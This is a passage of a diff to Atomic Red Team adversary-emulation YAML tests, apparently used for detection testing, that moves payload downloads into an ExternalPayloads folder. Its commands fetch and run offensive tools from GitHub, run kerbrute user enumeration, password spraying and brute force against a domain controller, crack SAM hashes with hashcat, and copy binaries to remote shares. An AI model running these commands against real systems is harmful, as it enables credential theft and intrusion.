"PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null + Invoke-WebRequest "https://www.radmin.com/download/Radmin_Viewer_3.5.2.1_EN.msi" -OutFile "PathToAtomicsFolder\..\ExternalPayloads\#{radmin_installer}" Write-Host Install Radmin - Start-Process msiexec -Wait -ArgumentList /i , $ENV:Temp\#{radmin_installer}, /qn + Start-Process msiexec -Wait -ArgumentList /i , "PathToAtomicsFolder\..\ExternalPayloads\#{radmin_installer}", /qn executor: name: command_prompt elevation_required: true @@ -56,9 +57,10 @@ atomic_tests: if (Test-Path "${env:ProgramFiles(x86)}/#{PDQ_Deploy_exe}") {exit 0} else {exit 1} get_prereq_command: | Write-Host Downloading PDQ Deploy installer - (New-Object Net.WebClient).DownloadFile("https://download.pdq.com/release/19/Deploy_19.3.350.0.exe","$ENV:Temp\#{PDQ_Deploy_installer}") + New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null + Invoke-WebRequest "https://download.pdq.com/release/19/Deploy_19.3.350.0.exe" -OutFile "PathToAtomicsFolder\..\ExternalPayloads\#{PDQ_Deploy_installer}" Write-Host Install PDQ Deploy - Start-Process $ENV:Temp\#{PDQ_Deploy_installer} -Wait -ArgumentList "/s" + Start-Process "PathToAtomicsFolder\..\ExternalPayloads\#{PDQ_Deploy_installer}" -Wait -ArgumentList "/s" executor: name: command_prompt elevation_required: true diff --git a/atomics/T1082/T1082.yaml b/atomics/T1082/T1082.yaml index b74238f3..fb6d280c 100644 --- a/atomics/T1082/T1082.yaml +++ b/atomics/T1082/T1082.yaml @@ -304,11 +304,12 @@ atomic_tests: dependency_executor_name: powershell dependencies: - description: | - The SkyArk AzureStealth module must exist in $env:temp. + The SkyArk AzureStealth module must exist in PathToAtomicsFolder\..\ExternalPayloads. prereq_command: | - if (test-path $env:temp\AzureStealth.ps1){exit 0} else {exit 1} + if (test-path PathToAtomicsFolder\..\ExternalPayloads\AzureStealth.ps1){exit 0} else {exit 1} get_prereq_command: | - invoke-webrequest "https://raw.githubusercontent.com/cyberark/SkyArk/3293ee145e95061a8980dd7b5da0030edc4da5c0/AzureStealth/AzureStealth.ps1" -outfile "$env:temp\AzureStealth.ps1" + New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null + invoke-webrequest "https://raw.githubusercontent.com/cyberark/SkyArk/3293ee145e95061a8980dd7b5da0030edc4da5c0/AzureStealth/AzureStealth.ps1" -outfile "PathToAtomicsFolder\..\ExternalPayloads\AzureStealth.ps1" - description: | The AzureAD module must be installed. prereq_command: | @@ -323,7 +324,7 @@ atomic_tests: Install-Module -Name Az -Force executor: command: | - Import-Module $env:temp\AzureStealth.ps1 -force + Import-Module PathToAtomicsFolder\..\ExternalPayloads\AzureStealth.ps1 -force $Password = ConvertTo-SecureString -String "#{password}" -AsPlainText -Force $Credential = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList "#{username}", $Password Connect-AzAccount -Credential $Credential diff --git a/atomics/T1083/T1083.yaml b/atomics/T1083/T1083.yaml index b36f4540..92dfa5fc 100644 --- a/atomics/T1083/T1083.yaml +++ b/atomics/T1083/T1083.yaml @@ -129,7 +129,7 @@ atomic_tests: dirlister_path: description: 'Path to the DirLister executable ' type: string - default: PathToAtomicsFolder\T1083\bin\DirLister.exe + default: PathToAtomicsFolder..\ExternalPayloads\DirLister.exe dependency_executor_name: powershell dependencies: - description: | @@ -138,11 +138,11 @@ atomic_tests: if (Test-Path #{dirlister_path}) {exit 0} else {exit 1} get_prereq_command: | $parentpath = Split-Path "#{dirlister_path}" - Invoke-WebRequest https://github.com/SanderSade/DirLister/releases/download/v2.beta4/DirLister.v2.beta4.zip -OutFile $env:TEMP\TDirLister.v2.beta4.zip New-Item -ItemType Directory -Force -Path $parentpath | Out-Null - Expand-Archive -Path $env:TEMP\TDirLister.v2.beta4.zip -DestinationPath $env:TEMP\TDirLister.v2.beta4 -Force - Copy-Item $env:TEMP\TDirLister.v2.beta4\* $parentpath -Recurse - Remove-Item $env:TEMP\TDirLister.v2.beta4.zip,$env:TEMP\TDirLister.v2.beta4 -Recurse -ErrorAction Ignore + Invoke-WebRequest https://github.com/SanderSade/DirLister/releases/download/v2.beta4/DirLister.v2.beta4.zip -OutFile PathToAtomicsFolder\..\ExternalPayloads\TDirLister.v2.beta4.zip + Expand-Archive -Path PathToAtomicsFolder\..\ExternalPayloads\TDirLister.v2.beta4.zip -DestinationPath PathToAtomicsFolder\..\ExternalPayloads\TDirLister.v2.beta4 -Force + Copy-Item PathToAtomicsFolder\..\ExternalPayloads\TDirLister.v2.beta4\* $parentpath -Recurse + Remove-Item PathToAtomicsFolder\..\ExternalPayloads\TDirLister.v2.beta4.zip,PathToAtomicsFolder\..\ExternalPayloads\TDirLister.v2.beta4 -Recurse -ErrorAction Ignore executor: command: | Start-Process #{dirlister_path} diff --git a/atomics/T1087.002/T1087.002.yaml b/atomics/T1087.002/T1087.002.yaml index 72fb67e3..0f4f6225 100644 --- a/atomics/T1087.002/T1087.002.yaml +++ b/atomics/T1087.002/T1087.002.yaml @@ -51,7 +51,7 @@ atomic_tests: adrecon_path: description: Path of ADRecon.ps1 file type: path - default: $env:TEMP\ADRecon.ps1 + default: PathToAtomicsFolder\..\ExternalPayloads\ADRecon.ps1 dependency_executor_name: powershell dependencies: - description: | @@ -59,13 +59,13 @@ atomic_tests: prereq_command: | if (Test-Path #{adrecon_path}) {exit 0} else {exit 1} get_prereq_command: | + New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null Invoke-WebRequest -Uri "https://raw.githubusercontent.com/sense-of-security/ADRecon/38e4abae3e26d0fa87281c1d0c65cabd4d3c6ebd/ADRecon.ps1" -OutFile #{adrecon_path} executor: command: | Invoke-Expression #{adrecon_path} cleanup_command: | - Remove-Item #{adrecon_path} -Force -ErrorAction Ignore | Out-Null - Get-ChildItem $env:TEMP -Recurse -Force | Where{$_.Name -Match "^ADRecon-Report-"} | Remove-Item -Force -Recurse + Get-ChildItem PathToAtomicsFolder\..\ExternalPayloads -Recurse -Force | Where{$_.Name -Match "^ADRecon-Report-"} | Remove-Item -Force -Recurse name: powershell - name: Adfind -Listing password policy auto_generated_guid: 736b4f53-f400-4c22-855d-1a6b5a551600 @@ -297,21 +297,21 @@ atomic_tests: dependency_executor_name: powershell dependencies: - description: | - kerbrute.exe must exist in $env:temp. + kerbrute.exe must exist in PathToAtomicsFolder\..\ExternalPayloads. prereq_command: | - if (test-path $env:temp\kerbrute.exe){exit 0} else {exit 1} + if (test-path PathToAtomicsFolder\..\ExternalPayloads\kerbrute.exe){exit 0} else {exit 1} get_prereq_command: | - invoke-webrequest "https://github.com/ropnop/kerbrute/releases/download/v1.0.3/kerbrute_windows_386.exe" -outfile "$env:TEMP\kerbrute.exe" + invoke-webrequest "https://github.com/ropnop/kerbrute/releases/download/v1.0.3/kerbrute_windows_386.exe" -outfile "PathToAtomicsFolder\..\ExternalPayloads\kerbrute.exe" - description: | - username text file must exist in $env:temp. + username text file must exist in PathToAtomicsFolder\..\ExternalPayloads. prereq_command: | - if (test-path $env:temp\username.txt){exit 0} else {exit 1} + if (test-path PathToAtomicsFolder\..\ExternalPayloads\username.txt){exit 0} else {exit 1} get_prereq_command: | - invoke-webrequest "https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1087.002/src/username.txt?raw=true" -outfile "$env:TEMP\username.txt" + invoke-webrequest "https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1087.002/src/username.txt?raw=true" -outfile "PathToAtomicsFolder\..\ExternalPayloads\username.txt" executor: command: |- - cd $env:temp - .\kerbrute.exe userenum -d #{Domain} --dc #{DomainController} $env:TEMP\username.txt + cd PathToAtomicsFolder\..\ExternalPayloads + .\kerbrute.exe userenum -d #{Domain} --dc #{DomainController} PathToAtomicsFolder\..\ExternalPayloads\username.txt name: powershell - name: Wevtutil - Discover NTLM Users Remote auto_generated_guid: b8a563d4-a836-4993-a74e-0a19b8481bfe diff --git a/atomics/T1090.003/T1090.003.yaml b/atomics/T1090.003/T1090.003.yaml index 57b7c5fe..76f7f2dc 100644 --- a/atomics/T1090.003/T1090.003.yaml +++ b/atomics/T1090.003/T1090.003.yaml @@ -54,7 +54,7 @@ atomic_tests: TorExe: description: Location of tor.exe file. type: string - default: $env:temp\tor\Tor\tor.exe + default: PathToAtomicsFolder\..\ExternalPayloads\tor\Tor\tor.exe dependency_executor_name: powershell dependencies: - description: | @@ -62,8 +62,9 @@ atomic_tests: prereq_command: | if (Test-Path #{TorExe}) {exit 0} else {exit 1} get_prereq_command: | - Start-BitsTransfer -Source "https://archive.torproject.org/tor-package-archive/torbrowser/11.0.6/tor-win32-0.4.6.9.zip" -Destination "$env:temp\tor.zip" -dynamic - expand-archive -LiteralPath "$env:temp\tor.zip" -DestinationPath "$env:temp\tor" + New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null + Invoke-WebRequest "https://archive.torproject.org/tor-package-archive/torbrowser/11.0.6/tor-win32-0.4.6.9.zip" -OutFile "PathToAtomicsFolder\..\ExternalPayloads\tor.zip" + expand-archive -LiteralPath "PathToAtomicsFolder\..\ExternalPayloads\tor.zip" -DestinationPath "PathToAtomicsFolder\..\ExternalPayloads\tor" executor: command: | invoke-expression 'cmd /c start powershell -Command {cmd /c #{TorExe}}' diff --git a/atomics/T1095/T1095.yaml b/atomics/T1095/T1095.yaml index a6175bb0..c00390a6 100644 --- a/atomics/T1095/T1095.yaml +++ b/atomics/T1095/T1095.yaml @@ -34,11 +34,11 @@ atomic_tests: ncat_exe: description: The location of ncat.exe type: path - default: $env:TEMP\T1095\nmap-7.80\ncat.exe + default: PathToAtomicsFolder\..\ExternalPayloads\T1095\nmap-7.80\ncat.exe ncat_path: description: The folder path of ncat.exe type: path - default: $env:TEMP\T1095 + default: PathToAtomicsFolder\..\ExternalPayloads\T1095 server_ip: description: The IP address or domain name of the listening server type: string diff --git a/atomics/T1105/T1105.yaml b/atomics/T1105/T1105.yaml index b216f426..8021e38b 100644 --- a/atomics/T1105/T1105.yaml +++ b/atomics/T1105/T1105.yaml @@ -321,7 +321,7 @@ atomic_tests: - description: 'Must have a Windows Defender version with MpCmdRun.exe installed' prereq_command: | cd "%ProgramData%\Microsoft\Windows Defender\platform\4.18*" - MpCmdRun.exe /? + MpCmdRun.exe /? >nul 2>&1 get_prereq_command: Echo "A version of Windows Defender with MpCmdRun.exe must be installed manually" executor: command: | @@ -460,11 +460,11 @@ atomic_tests: prereq_command: | if (Test-Path #{curl_path}) {exit 0} else {exit 1} get_prereq_command: | - Invoke-WebRequest "https://curl.se/windows/dl-7.79.1/curl-7.79.1-win64-mingw.zip" -Outfile $env:temp\curl.zip - Expand-Archive -Path $env:temp\curl.zip -DestinationPath $env:temp\curl - Copy-Item $env:temp\curl\curl-7.79.1-win64-mingw\bin\curl.exe C:\Windows\System32\Curl.exe - Remove-Item $env:temp\curl - Remove-Item $env:temp\curl.zip + Invoke-WebRequest "https://curl.se/windows/dl-7.79.1/curl-7.79.1-win64-mingw.zip" -Outfile PathToAtomicsFolder\..\ExternalPayloads\curl.zip + Expand-Archive -Path PathToAtomicsFolder\..\ExternalPayloads\curl.zip -DestinationPath PathToAtomicsFolder\..\ExternalPayloads\curl + Copy-Item PathToAtomicsFolder\..\ExternalPayloads\curl\curl-7.79.1-win64-mingw\bin\curl.exe C:\Windows\System32\Curl.exe + Remove-Item PathToAtomicsFolder\..\ExternalPayloads\curl + Remove-Item PathToAtomicsFolder\..\ExternalPayloads\curl.zip executor: command: | #{curl_path} -k #{file_download} -o c:\users\public\music\allthethingsx64.dll @@ -505,11 +505,11 @@ atomic_tests: prereq_command: | if (Test-Path #{curl_path}) {exit 0} else {exit 1} get_prereq_command: | - Invoke-WebRequest “https://curl.se/windows/dl-7.79.1/curl-7.79.1-win64-mingw.zip” -Outfile $env:temp\curl.zip - Expand-Archive -Path $env:temp\curl.zip -DestinationPath $env:temp\curl - Copy-Item $env:temp\curl\curl-7.79.1-win64-mingw\bin\curl.exe C:\Windows\System32\Curl.exe - Remove-Item $env:temp\curl - Remove-Item $env:temp\curl.zip + Invoke-WebRequest “https://curl.se/windows/dl-7.79.1/curl-7.79.1-win64-mingw.zip” -Outfile PathToAtomicsFolder\..\ExternalPayloads\curl.zip + Expand-Archive -Path PathToAtomicsFolder\..\ExternalPayloads\curl.zip -DestinationPath PathToAtomicsFolder\..\ExternalPayloads\curl + Copy-Item PathToAtomicsFolder\..\ExternalPayloads\curl\curl-7.79.1-win64-mingw\bin\curl.exe C:\Windows\System32\Curl.exe + Remove-Item PathToAtomicsFolder\..\ExternalPayloads\curl + Remove-Item PathToAtomicsFolder\..\ExternalPayloads\curl.zip - description: | A file must be created to upload prereq_command: | @@ -589,17 +589,17 @@ atomic_tests: get_prereq_command: | write-host "The binary_file input parameter must be set to a binary that exists on this computer." - description: | - Machine list must exist at specified location ("$env:temp\T1105MachineList.txt") + Machine list must exist at specified location ("PathToAtomicsFolder\..\ExternalPayloads\T1105MachineList.txt") prereq_command: | - if (Test-Path "$env:temp\T1105MachineList.txt") {exit 0} else {exit 1} + if (Test-Path "PathToAtomicsFolder\..\ExternalPayloads\T1105MachineList.txt") {exit 0} else {exit 1} get_prereq_command: | - new-item -path "$env:temp\T1105MachineList.txt" - echo "A machine list file has been generated at "$env:temp\T1105MachineList.txt". Please enter the machines to target there, one machine per line." + new-item -path "PathToAtomicsFolder\..\ExternalPayloads\T1105MachineList.txt" | Out-Null + echo "A machine list file has been generated at "PathToAtomicsFolder\..\ExternalPayloads\T1105MachineList.txt". Please enter the machines to target there, one machine per line." executor: command: | - $machine_list = "$env:temp\T1105MachineList.txt" - $offline_list = "$env:temp\T1105OfflineHosts.txt" - $completed_list = "$env:temp\T1105CompletedHosts.txt" + $machine_list = "PathToAtomicsFolder\..\ExternalPayloads\T1105MachineList.txt" + $offline_list = "PathToAtomicsFolder\..\ExternalPayloads\T1105OfflineHosts.txt" + $completed_list = "PathToAtomicsFolder\..\ExternalPayloads\T1105CompletedHosts.txt" foreach ($machine in get-content -path "$machine_list") {if (test-connection -Count 1 -computername $machine -quiet) {cmd /c copy "#{binary_file}" "\\$machine\#{remote_drive_letter}$#{exe_remote_folder}" @@ -608,12 +608,12 @@ atomic_tests: else {echo $machine >> "$offline_list"}} cleanup_command: | - if (test-path "$env:temp\T1105CompletedHosts.txt") - {foreach ($machine in get-content -path "$env:temp\T1105CompletedHosts.txt") + if (test-path "PathToAtomicsFolder\..\ExternalPayloads\T1105CompletedHosts.txt") + {foreach ($machine in get-content -path "PathToAtomicsFolder\..\ExternalPayloads\T1105CompletedHosts.txt") {wmic /node: "$machine" process where name='"regsvr32.exe"' call terminate | out-null Remove-Item -path "\\$machine\#{remote_drive_letter}$#{exe_remote_folder}" -force -erroraction silentlycontinue}} - Remove-Item -path "$env:temp\T1105OfflineHosts.txt" -erroraction silentlycontinue - Remove-item -path "$env:temp\T1105CompletedHosts.txt" -erroraction silentlycontinue + Remove-Item -path "PathToAtomicsFolder\..\ExternalPayloads\T1105OfflineHosts.txt" -erroraction silentlycontinue + Remove-item -path "PathToAtomicsFolder\..\ExternalPayloads\T1105CompletedHosts.txt" -erroraction silentlycontinue name: powershell - name: Printer Migration Command-Line Tool UNC share folder into a zip file @@ -777,7 +777,7 @@ atomic_tests: local_nimgrab: description: Local path to nimgrab type: path - default: $env:TEMP\nimgrab.exe + default: PathToAtomicsFolder\..\ExternalPayloads\nimgrab.exe executor: command: | cmd /c nimgrab.exe #{remote_file} #{destination_path} @@ -791,11 +791,11 @@ atomic_tests: prereq_command: | if (Test-Path "#{local_nimgrab}") {exit 0} else {exit 1} get_prereq_command: | - Invoke-WebRequest "https://nim-lang.org/download/nim-1.6.6_x64.zip" -Outfile $env:temp\nim.zip - Expand-Archive -Path $env:temp\nim.zip -DestinationPath $env:temp\nim -Force - Copy-Item $env:temp\nim\nim-1.6.6\bin\nimgrab.exe #{local_nimgrab} - Remove-Item $env:temp\nim - Remove-Item $env:temp\nim.zip + Invoke-WebRequest "https://nim-lang.org/download/nim-1.6.6_x64.zip" -Outfile PathToAtomicsFolder\..\ExternalPayloads\nim.zip + Expand-Archive -Path PathToAtomicsFolder\..\ExternalPayloads\nim.zip -DestinationPath PathToAtomicsFolder\..\ExternalPayloads\nim -Force + Copy-Item PathToAtomicsFolder\..\ExternalPayloads\nim\nim-1.6.6\bin\nimgrab.exe #{local_nimgrab} + Remove-Item PathToAtomicsFolder\..\ExternalPayloads\nim + Remove-Item PathToAtomicsFolder\..\ExternalPayloads\nim.zip - name: iwr or Invoke Web-Request download auto_generated_guid: c01cad7f-7a4c-49df-985e-b190dcf6a279 description: | diff --git a/atomics/T1110.001/T1110.001.yaml b/atomics/T1110.001/T1110.001.yaml index 794600d5..8472bfa9 100644 --- a/atomics/T1110.001/T1110.001.yaml +++ b/atomics/T1110.001/T1110.001.yaml @@ -135,22 +135,23 @@ atomic_tests: dependency_executor_name: powershell dependencies: - description: | - kerbrute.exe must exist in $env:temp + kerbrute.exe must exist in PathToAtomicsFolder\..\ExternalPayloads prereq_command: | - if (test-path $env:temp\kerbrute.exe){exit 0} else {exit 1} + if (test-path PathToAtomicsFolder\..\ExternalPayloads\kerbrute.exe){exit 0} else {exit 1} get_prereq_command: | - invoke-webrequest "https://github.com/ropnop/kerbrute/releases/download/v1.0.3/kerbrute_windows_386.exe" -outfile "$env:temp\kerbrute.exe" + New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null + invoke-webrequest "https://github.com/ropnop/kerbrute/releases/download/v1.0.3/kerbrute_windows_386.exe" -outfile "PathToAtomicsFolder\..\ExternalPayloads\kerbrute.exe" - description: | - bruteuser.txt must exist in $env:temp + bruteuser.txt must exist in PathToAtomicsFolder\..\ExternalPayloads prereq_command: | - if (test-path $env:temp\bruteuser.txt){exit 0} else {exit 1} + if (test-path PathToAtomicsFolder\..\ExternalPayloads\bruteuser.txt){exit 0} else {exit 1} get_prereq_command: | - invoke-webrequest "https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.001/src/bruteuser.txt?raw=true" -outfile "$env:temp\bruteuser.txt" + invoke-webrequest "https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.001/src/bruteuser.txt?raw=true" -outfile "PathToAtomicsFolder\..\ExternalPayloads\bruteuser.txt" executor: name: powershell elevation_required: false command: | - cd $env:temp + cd PathToAtomicsFolder\..\ExternalPayloads .\kerbrute.exe bruteuser --dc #{domaincontroller} -d #{domain} $env:temp\bruteuser.txt TestUser1 - name: SUDO Brute Force - Debian diff --git a/atomics/T1110.002/T1110.002.yaml b/atomics/T1110.002/T1110.002.yaml index 68a39ce0..dc4d3bba 100644 --- a/atomics/T1110.002/T1110.002.yaml +++ b/atomics/T1110.002/T1110.002.yaml @@ -10,7 +10,7 @@ atomic_tests: hashcat_exe: description: Path to Hashcat executable type: string - default: '%temp%\hashcat6\hashcat-6.1.1\hashcat.exe' + default: 'PathToAtomicsFolder\..\ExternalPayloads\hashcat6\hashcat-6.1.1\hashcat.exe' input_file_sam: description: Path to SAM file type: string @@ -24,20 +24,21 @@ atomic_tests: - description: Hashcat must exist on disk at specified location (#{hashcat_exe}) prereq_command: 'if (Test-Path $(cmd /c echo #{hashcat_exe})) {exit 0} else {exit 1}' get_prereq_command: |- - Invoke-WebRequest "https://www.7-zip.org/a/7z1900.exe" -OutFile "$env:TEMP\7z1900.exe" - Start-Process -FilePath "$env:Temp\7z1900.exe" -ArgumentList "/S /D=$env:temp\7zi" -NoNewWindow - Invoke-WebRequest "https://hashcat.net/files/hashcat-6.1.1.7z" -OutFile "$env:TEMP\hashcat6.7z" + New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null + Invoke-WebRequest "https://www.7-zip.org/a/7z1900.exe" -OutFile "PathToAtomicsFolder\..\ExternalPayloads\7z1900.exe" + Start-Process -FilePath "PathToAtomicsFolder\..\ExternalPayloads\7z1900.exe" -ArgumentList "/S /D=PathToAtomicsFolder\..\ExternalPayloads\7zi" -NoNewWindow + Invoke-WebRequest "https://hashcat.net/files/hashcat-6.1.1.7z" -OutFile "PathToAtomicsFolder\..\ExternalPayloads\hashcat6.7z" Start-Process cmd.exe -Args "/c %temp%\7z\7z.exe x %temp%\hashcat6.7z -aoa -o%temp%\hashcat-unzip" -Wait New-Item -ItemType Directory (Split-Path $(cmd /c echo #{hashcat_exe})) -Force | Out-Null - Move-Item $env:Temp\hashcat-unzip\hashcat-6.1.1\* $(cmd /c echo #{hashcat_exe}\..) -Force -ErrorAction Ignore + Move-Item PathToAtomicsFolder\..\ExternalPayloads\hashcat-unzip\hashcat-6.1.1\* $(cmd /c echo #{hashcat_exe}\..) -Force -ErrorAction Ignore executor: command: |- cd #{hashcat_exe}\.. #{hashcat_exe} -a 0 -m 1000 -r .\rules\Incisive-leetspeak.rule #{input_file_sam} #{input_file_passwords} cleanup_command: |- - del %temp%\hashcat6.7z >nul 2>&1 - del %temp%\7z1900.exe >nul 2>&1 - del %temp%\7z /Q /S >nul 2>&1 - del %temp%\hashcat-unzip /Q /S >nul 2>&1 + del PathToAtomicsFolder\..\ExternalPayloads\hashcat6.7z >nul 2>&1 + del PathToAtomicsFolder\..\ExternalPayloads\7z1900.exe >nul 2>&1 + del PathToAtomicsFolder\..\ExternalPayloads\7z /Q /S >nul 2>&1 + del PathToAtomicsFolder\..\ExternalPayloads\hashcat-unzip /Q /S >nul 2>&1 name: command_prompt elevation_required: true diff --git a/atomics/T1110.003/T1110.003.yaml b/atomics/T1110.003/T1110.003.yaml index 6ba5912b..ee222687 100644 --- a/atomics/T1110.003/T1110.003.yaml +++ b/atomics/T1110.003/T1110.003.yaml @@ -242,16 +242,17 @@ atomic_tests: dependency_executor_name: powershell dependencies: - description: | - MSOLSpray module must exist in $env:temp. + MSOLSpray module must exist in PathToAtomicsFolder\..\ExternalPayloads. prereq_command: | - if (test-path $env:temp\MSOLSpray.ps1){exit 0} else {exit 1} + if (test-path PathToAtomicsFolder\..\ExternalPayloads\MSOLSpray.ps1){exit 0} else {exit 1} get_prereq_command: | - invoke-webrequest "https://raw.githubusercontent.com/dafthack/MSOLSpray/922f159104fb3ec77c9fc6507a6388a05c227b5f/MSOLSpray.ps1" -outfile "$env:temp\MSOLSpray.ps1" + New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null + invoke-webrequest "https://raw.githubusercontent.com/dafthack/MSOLSpray/922f159104fb3ec77c9fc6507a6388a05c227b5f/MSOLSpray.ps1" -outfile "PathToAtomicsFolder\..\ExternalPayloads\MSOLSpray.ps1" executor: name: powershell elevation_required: false command: | - import-module "$env:temp\MSOLSpray.ps1" + import-module "PathToAtomicsFolder\..\ExternalPayloads\MSOLSpray.ps1" Invoke-MSOLSpray -UserList "#{user_list}" -Password "#{password}" - name: Password Spray using Kerbrute Tool auto_generated_guid: c6f25ec3-6475-47a9-b75d-09ac593c5ecb @@ -271,23 +272,24 @@ atomic_tests: dependency_executor_name: powershell dependencies: - description: | - kerbrute.exe must exist in $env:temp + kerbrute.exe must exist in PathToAtomicsFolder\..\ExternalPayloads prereq_command: | - if (test-path $env:temp\kerbrute.exe){exit 0} else {exit 1} + if (test-path PathToAtomicsFolder\..\ExternalPayloads\kerbrute.exe){exit 0} else {exit 1} get_prereq_command: | - invoke-webrequest "https://github.com/ropnop/kerbrute/releases/download/v1.0.3/kerbrute_windows_386.exe" -outfile "$env:temp\kerbrute.exe" + New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null + invoke-webrequest "https://github.com/ropnop/kerbrute/releases/download/v1.0.3/kerbrute_windows_386.exe" -outfile "PathToAtomicsFolder\..\ExternalPayloads\kerbrute.exe" - description: | - passwordspray.txt must exist in $env:temp + passwordspray.txt must exist in PathToAtomicsFolder\..\ExternalPayloads prereq_command: | - if (test-path $env:temp\passwordspray.txt){exit 0} else {exit 1} + if (test-path PathToAtomicsFolder\..\ExternalPayloads\passwordspray.txt){exit 0} else {exit 1} get_prereq_command: | - invoke-webrequest "https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.003/src/passwordspray.txt?raw=true" -outfile "$env:temp\passwordspray.txt" + invoke-webrequest "https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.003/src/passwordspray.txt?raw=true" -outfile "PathToAtomicsFolder\..\ExternalPayloads\passwordspray.txt" executor: name: powershell elevation_required: false command: | - cd $env:temp - .\kerbrute.exe passwordspray --dc #{domaincontroller} -d #{domain} $env:temp\passwordspray.txt password132 + cd PathToAtomicsFolder\..\ExternalPayloads + .\kerbrute.exe passwordspray --dc #{domaincontroller} -d #{domain} PathToAtomicsFolder\..\ExternalPayloads\passwordspray.txt password132 - name: AWS - Password Spray an AWS using GoAWSConsoleSpray auto_generated_guid: 9c10d16b-20b1-403a-8e67-50ef7117ed4e description: | diff --git a/atomics/T1110.004/T1110.004.yaml b/atomics/T1110.004/T1110.004.yaml index df4c510e..ae76069a 100644 --- a/atomics/T1110.004/T1110.004.yaml +++ b/atomics/T1110.004/T1110.004.yaml @@ -81,20 +81,21 @@ atomic_tests: dependency_executor_name: powershell dependencies: - description: | - kerbrute.exe must exist in $env:temp + kerbrute.exe must exist in PathToAtomicsFolder\..\ExternalPayloads prereq_command: | - if (test-path $env:temp\kerbrute.exe){exit 0} else {exit 1} + if (test-path PathToAtomicsFolder\..\ExternalPayloads\kerbrute.exe){exit 0} else {exit 1} get_prereq_command: | - invoke-webrequest "https://github.com/ropnop/kerbrute/releases/download/v1.0.3/kerbrute_windows_386.exe" -outfile "$env:temp\kerbrute.exe" + New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null + invoke-webrequest "https://github.com/ropnop/kerbrute/releases/download/v1.0.3/kerbrute_windows_386.exe" -outfile "PathToAtomicsFolder\..\ExternalPayloads\kerbrute.exe" - description: | - bruteforce.txt must exist in $env:temp + bruteforce.txt must exist in PathToAtomicsFolder\..\ExternalPayloads prereq_command: | - if (test-path $env:temp\bruteforce.txt){exit 0} else {exit 1} + if (test-path PathToAtomicsFolder\..\ExternalPayloads\bruteforce.txt){exit 0} else {exit 1} get_prereq_command: | - invoke-webrequest "https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.004/src/bruteforce.txt?raw=true" -outfile "$env:temp\bruteforce.txt" + invoke-webrequest "https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.004/src/bruteforce.txt?raw=true" -outfile "PathToAtomicsFolder\..\ExternalPayloads\bruteforce.txt" executor: name: powershell elevation_required: false command: | - cd $env:temp - .\kerbrute.exe bruteforce --dc #{domaincontroller} -d #{domain} $env:temp\bruteforce.txt + cd PathToAtomicsFolder\..\ExternalPayloads + .\kerbrute.exe bruteforce --dc #{domaincontroller} -d #{domain} PathToAtomicsFolder\..\ExternalPayloads\bruteforce.txt diff --git a/atomics/T1133/T1133.yaml b/atomics/T1133/T1133.yaml index 68f973f9..7e874dba 100644 --- a/atomics/T1133/T1133.yaml +++ b/atomics/T1133/T1133.yaml @@ -24,8 +24,9 @@ atomic_tests: Chrome must be installed prereq_command: 'if ((Test-Path "C:\Program Files\Google\Chrome\Application\chrome.exe") -Or (Test-Path "C:\Program Files (x86)\Google\Chrome\Application\chrome.exe")) {exit 0} else {exit 1}' get_prereq_command: | - Invoke-WebRequest -OutFile $env:temp\ChromeStandaloneSetup64.exe #{chrome_url} - Start-Process $env:temp\ChromeStandaloneSetup64.exe /S + New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null + Invoke-WebRequest -OutFile PathToAtomicsFolder\..\ExternalPayloads\ChromeStandaloneSetup64.exe #{chrome_url} + Start-Process PathToAtomicsFolder\..\ExternalPayloads\ChromeStandaloneSetup64.exe /S executor: name: powershell elevation_required: true diff --git a/atomics/T1134.001/T1134.001.yaml b/atomics/T1134.001/T1134.001.yaml index 454f89b9..b6a1e95e 100644 --- a/atomics/T1134.001/T1134.001.yaml +++ b/atomics/T1134.001/T1134.001.yaml @@ -40,7 +40,7 @@ atomic_tests: nsudo_path: description: 'Path to the NSudo bat file' type: path - default: $env:TEMP\NSudo_8.2_All_Components\NSudo_Launcher\x64\NSudoLG.exe + default: PathToAtomicsFolder\..\ExternalPayloads\NSudo_8.2_All_Components\NSudo_Launcher\x64\NSudoLG.exe dependency_executor_name: powershell dependencies: - description: | @@ -48,10 +48,11 @@ atomic_tests: prereq_command: | if (Test-Path #{nsudo_path}) {exit 0} else {exit 1} get_prereq_command: | - Invoke-WebRequest -OutFile $env:TEMP\NSudo_8.2_All_Components.zip "https://github.com/M2Team/NSudo/releases/download/8.2/NSudo_8.2_All_Components.zip" - Expand-Archive -Path $env:TEMP\NSudo_8.2_All_Components.zip -DestinationPath $env:TEMP\NSudo_8.2_All_Components -Force - Rename-Item "$env:TEMP\NSudo_8.2_All_Components\NSudo Launcher" $env:TEMP\NSudo_8.2_All_Components\NSudo_Launcher - Remove-Item $env:TEMP\NSudo_8.2_All_Components.zip -Recurse -ErrorAction Ignore + New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null + Invoke-WebRequest -OutFile "PathToAtomicsFolder\..\ExternalPayloads\NSudo_8.2_All_Components.zip" 